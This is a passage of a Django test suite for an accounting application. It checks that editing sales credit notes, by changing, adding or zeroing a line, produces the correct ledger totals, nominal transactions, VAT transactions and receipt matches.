data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (-100 + -20)
)
self.assertEqual(
header.goods,
-20 * -100
)
self.assertEqual(
header.vat,
-20 * -20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
1200
)
self.assertEqual(
header.due,
1200
)
self.assertEqual(
receipt.total,
-2400
)
self.assertEqual(
receipt.paid,
-1200
)
self.assertEqual(
receipt.due,
-1200
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
100 + 20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
1
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[0] # receipt created first before invoice
)
self.assertEqual(
matches[0].value,
-1200
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
class EditCreditNoteNominalEntries(TestCase):
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_superuser(username="dummy", password="dummy")
cls.factory = RequestFactory()
cls.customer = Customer.objects.create(name="test_customer")
cls.ref = "test matching"
cls.date = datetime.now().strftime(DATE_INPUT_FORMAT)
cls.due_date = (datetime.now() + timedelta(days=31)).strftime(DATE_INPUT_FORMAT)
cls.model_date = datetime.now().strftime(MODEL_DATE_INPUT_FORMAT)
cls.model_due_date = (datetime.now() + timedelta(days=31)).strftime(MODEL_DATE_INPUT_FORMAT)
fy = FinancialYear.objects.create(financial_year=2020)
cls.period = Period.objects.create(fy=fy, period="01", fy_and_period="202001", month_start=date(2020,1,31))
cls.description = "a line description"
# ASSETS
assets = Nominal.objects.create(name="Assets")
current_assets = Nominal.objects.create(parent=assets, name="Current Assets")
cls.nominal = Nominal.objects.create(parent=current_assets, name="Bank Account")
cls.sale_control = Nominal.objects.create(
parent=current_assets, name="Sales Ledger Control"
)
# LIABILITIES
liabilities = Nominal.objects.create(name="Liabilities")
current_liabilities = Nominal.objects.create(parent=liabilities, name="Current Liabilities")
cls.vat_nominal = Nominal.objects.create(parent=current_liabilities, name="Vat")
cls.vat_code = Vat.objects.create(code="1", name="standard rate", rate=20)
ModuleSettings.objects.create(
cash_book_period=cls.period,
nominals_period=cls.period,
purchases_period=cls.period,
sales_period=cls.period
)
# CORRECT USAGE
# Basic edit here in so far as we just change a line value
def test_nominals_created_for_lines_with_goods_and_vat_above_zero(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.header, header)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": -1 * header.total - 60 # we half the goods and vat for a line
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
line_forms[-1]["goods"] = 50
line_forms[-1]["vat"] = 10
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
self.assertEqual(
headers[0].total,
-2340
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2340
)
nom_trans = NominalTransaction.objects.all()
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
vat_transactions = list(vat_transactions)
lines = list(lines)
unedited_lines = list(lines)[:-1]
for i, line in enumerate(unedited_lines):
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.header, header)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
i = i + 1
edited_line = lines[-1]
self.assertEqual(edited_line.line_no, i + 1)
self.assertEqual(edited_line.header, header)
self.assertEqual(edited_line.description, self.description)
self.assertEqual(edited_line.goods, -50)
self.assertEqual(edited_line.nominal, self.nominal)
self.assertEqual(edited_line.vat_code, self.vat_code)
self.assertEqual(edited_line.vat, -10)
self.assertEqual(
edited_line.goods_nominal_transaction,
nom_trans[ 57 ]
)
self.assertEqual(
edited_line.vat_nominal_transaction,
nom_trans[ 58 ]
)
self.assertEqual(
edited_line.total_nominal_transaction,
nom_trans[ 59 ]
)
self.assertEqual(
edited_line.vat_transaction,
vat_transactions[-1]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
unedited_goods_nom_trans = goods_nom_trans[:-1]
# CHECK OUR UNEDITED FIRST ARE INDEED UNEDITED
for tran in unedited_goods_nom_trans:
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
unedited_vat_nom_trans = vat_nom_trans[:-1]
for tran in unedited_vat_nom_trans:
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
unedited_total_nom_trans = total_nom_trans[:-1]
for tran in unedited_total_nom_trans:
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
# NOW CHECK THE EDITED
edited_goods_nom_tran = goods_nom_trans[-1]
self.assertEqual(
edited_goods_nom_tran.value,
50
)
self.assertEqual(
edited_goods_nom_tran.nominal,
self.nominal
)
self.assertEqual(
edited_goods_nom_tran.field,
"g"
)
edited_vat_nom_tran = vat_nom_trans[-1]
self.assertEqual(
edited_vat_nom_tran.value,
10
)
self.assertEqual(
edited_vat_nom_tran.nominal,
self.vat_nominal
)
self.assertEqual(
edited_vat_nom_tran.field,
"v"
)
edited_total_nom_tran = total_nom_trans[-1]
self.assertEqual(
edited_total_nom_tran.value,
-60
)
self.assertEqual(
edited_total_nom_tran.nominal,
self.sale_control
)
self.assertEqual(
edited_total_nom_tran.field,
"t"
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Add another line this time
def test_nominals_created_for_new_line(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": (-1 * header.total) + 120
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
last_line_form = line_forms[-1].copy()
last_line_form["id"] = ""
line_forms.append(last_line_form)
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
self.assertEqual(
headers[0].total,
-2520
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2520
)
nom_trans = NominalTransaction.objects.all()
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
self.assertEqual(
len(nom_trans),
21 + 21 + 21
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
21
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
21
)
vat_transactions = list(vat_transactions)
lines = list(lines)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for tran in goods_nom_trans:
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
for tran in vat_nom_trans:
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
for tran in total_nom_trans:
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Based on above
# Except this time we reduce goods to zero on a line
# This should delete the corresponding nominal transaction for goods
# And obviously change the control account nominal value
def test_goods_reduced_to_zero_but_vat_non_zero_on_a_line(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": -1 * header.total - 100 # we set goods = 0 when previously was 100
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
line_forms[-1]["goods"] = 0
line_forms[-1]["vat"] = 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
self.assertEqual(
headers[0].total,
-2300
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2300
)
nom_trans = NominalTransaction.objects.all()
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
self.assertEqual(
len(nom_trans),
19 + 20 + 20
# 19 goods nominal transactions
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
vat_transactions = list(vat_transactions)
lines = list(lines)
unedited_lines = list(lines)[:-1]
for i, line in enumerate(unedited_lines):
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.header, header)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
i = i + 1
edited_line = lines[-1]
self.assertEqual(edited_line.header, header)
self.assertEqual(edited_line.line_no, i + 1)
self.assertEqual(edited_line.description, self.description)
self.assertEqual(edited_line.goods, 0)
self.assertEqual(edited_line.nominal, self.nominal)
self.assertEqual(edited_line.vat_code, self.vat_code)
self.assertEqual(edited_line.vat, -20)
# NOMINAL TRANSACTION FOR GOODS IS REMOVED
self.assertEqual(
edited_line.goods_nominal_transaction,
None
)
self.assertEqual(
edited_line.vat_nominal_transaction,
nom_trans[ 57 ]
)
self.assertEqual(
edited_line.total_nominal_transaction,
nom_trans[ 58 ]
)
self.assertEqual(
edited_line.vat_transaction,
vat_transactions[-1]
)
goods_nom_trans = nom_trans[:-2:3]
vat_nom_trans = nom_trans[1:-2:3]
total_nom_trans = nom_trans[2:-2:3]
unedited_goods_nom_trans = goods_nom_trans
# CHECK OUR UNEDITED FIRST ARE INDEED UNEDITED
for tran in unedited_goods_nom_trans:
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
unedited_vat_nom_trans = vat_nom_trans
for tran in unedited_vat_nom_trans:
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
unedited_total_nom_trans = total_nom_trans
for tran in unedited_total_nom_trans:
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
# NOW CHECK THE EDITED
edited_vat_nom_tran = nom_trans[-2]
self.assertEqual(
edited_vat_nom_tran.value,
20
)
self.assertEqual(
